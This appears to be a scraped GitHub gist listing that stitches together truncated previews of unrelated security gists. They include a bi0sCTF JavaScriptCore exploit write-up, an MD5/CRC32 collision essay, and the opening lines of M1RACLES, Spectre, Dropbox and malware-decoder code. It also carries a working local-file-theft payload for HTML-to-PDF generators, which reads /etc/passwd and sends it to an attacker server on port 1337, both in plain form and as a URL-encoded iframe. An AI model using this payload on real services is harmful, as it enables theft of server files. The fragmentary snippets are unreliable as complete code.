Eli Grey eligrey

@d4rk-kn1gh7
d4rk-kn1gh7 / writeup.md
Created January 22, 2023 10:27
bi0sCTF 2022 - b3typer

Short Writeup

  • Simple typer bug, range of BitAnd opcode is assumed to be [1, operand] when in reality it is [0, operand].
  • Use range assumptions to create unchecked integer underflow.
  • Bypass array bounds checks and obtain OOB write, overwrite size of array to get overlap.
  • Use double & object array overlap to create addrOf & fakeObj primitives.
  • Create overlapping fake array using StructureID leak to obtain arbitrary R/W.

The trick here is to convert a CheckedAdd node to a normal Add node due to the incorrect range, and cause an unchecked integer underflow. When there is no underflow check, you can cause DFGIntegerRangeOptimization to make incorrect assumptions about bounds, and subsequently remove bounds checks (more details in the comments of the exploit).

MD5 Collision with CRC32 Preimage

Here's the scenario: We want to craft two different messages with the same MD5 hash, and a specific CRC32 checksum, simultaneously.

In other words, we want an MD5 collision attack and a CRC32 preimage attack.

This might seem like a contrived scenario, but it's exactly the one I faced while producing my PNG hashquine (Yes OK maybe that's also a contrived scenario, cut me some slack).

On its own, a CRC32 preimage attack is trivial. You can craft a 4-byte suffix that gives any message a specific checksum, calculated using a closed-form expression (which I am too lazy to derive, not even with assistance from Z3). It's not an attack per se, since CRC32 was never meant to be cryptographically secure in the first place.

// Keep the tab busy with audio.
const audioCtx = new AudioContext();
const gainNode = audioCtx.createGain();
gainNode.gain.value = 0.1;
gainNode.connect(audioCtx.destination);
const oscillatorNode = audioCtx.createOscillator();
oscillatorNode.type = "square";
/*
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
*
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
*
* Please visit m1racles.com for more information.
*
* Licensed under the MIT license.
*/
@lc
lc / poc.md
Created March 28, 2019 01:07
xhr to steal local files in HTML2PDF generators
x=new XMLHttpRequest;x.onload=function(){l=new XMLHttpRequest;l.open("GET","http://<ATTACKER-SERVER>:1337/"+encodeURIComponent(this.responseText));l.send();};x.open("GET","file:///etc/passwd");x.send();
<iframe src="javascript:%78%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%78%2e%6f%6e%6c%6f%61%64%3d%66%75%6e%63%74%69%6f%6e%28%29%7b%6c%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%3b%6c%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%68%74%74%70%3a%2f%2f%78%2e%78%78%65%2e%73%68%3a%31%33%33%37%2f%22%2b%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%74%68%69%73%2e%72%65%73%70%6f%6e%73%65%54%65%78%74%29%29%3b%6c%2e%73%65%6e%64%28%29%3b%7d%3b%78%2e%6f%70%65%6e%28%22%47%45%54%22%2c%22%66%69%6c%65%3a%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64%22%29%3b%78%2e%73%65%6e%64%28%29%3b%0a"></iframe>
@MatthewWilkes
MatthewWilkes / automated.py
Created January 24, 2019 16:30
Extract deleted commits from a GitHub repo
import argparse
import os
import re
import subprocess
import tempfile
import requests
def get_repo(owner, repo):
@hasherezade
hasherezade / str_decoder.cpp
Last active December 20, 2018 18:11
Decoder for the obfuscated strings from malware: ef0cb0a1a29bcdf2b36622f72734aec8d38326fc8f7270f78bd956e706a5fd57
#include <iostream>
#include <Windows.h>
char* decode_string(const char *a1)
{
const BYTE *enc_str = (BYTE*)a1;
signed int enc_len = strlen(a1);
BYTE *v4;
int v5;
@dimaryaz
dimaryaz / dropbox_ext4.c
Created August 15, 2018 07:28
Dropbox ext4 hack
/*
* dropbox_ext4.c
*
* Compile like this:
* gcc -shared -fPIC -ldl -o libdropbox_ext4.so dropbox_ext4.c
*
* Run Dropbox like this:
* LD_PRELOAD=./libdropbox_ext4.so ~/.dropbox-dist/dropboxd
*/
@wdormann
wdormann / flash_killbit.reg
Last active June 1, 2021 15:03
Disable Flash ActiveX in all Windows versions (including 10)
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MicrosoftEdge\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
"Compatibility Flags"=dword:00000400
@ErikAugust
ErikAugust / spectre.c
Last active April 15, 2024 13:55
Spectre example code
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif